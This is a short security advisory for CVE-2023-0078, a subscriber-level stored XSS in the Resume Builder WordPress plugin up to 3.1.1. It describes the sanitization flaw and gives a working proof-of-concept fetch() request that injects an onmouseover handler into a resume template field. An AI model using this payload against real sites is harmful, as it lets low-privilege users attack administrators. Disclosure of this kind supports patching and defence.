Resume Builder <= 3.1.1 – Subscriber+ Stored XSS | CVE 2023-0078

Description

The plugin does not sanitize and escape some parameters related to Resume, which could allow users with a role as low as subscriber to perform Stored XSS attacks against higher privilege users

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=rb_save_resume&resume_id=undefined&resume_data={"name":"XSS","featured_image":false,"featured_image_url":false,"resume_file":false,"introduction":{"subtitle":"XSS","content":"<p></p>"},"contact":{"email":"","phone":"","website":"","address":""},"experience":[],"skills":[],"display":{"template":"default\\" onmouseover=\\"alert(1)\\"","text_color":"#000000","highlight_color":"#2271b1","star_color":"#ffA500","wrapper_style":"full","max_width":"100","max_width_type":"percent","padding":"0","container_bg":"#ffffff","container_shadow":"false","container_border_radius":"0","sidebar_position":"left","rating_stars":"show","photo_size":"100","attachment_button_text":"Download Attachment"}}'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));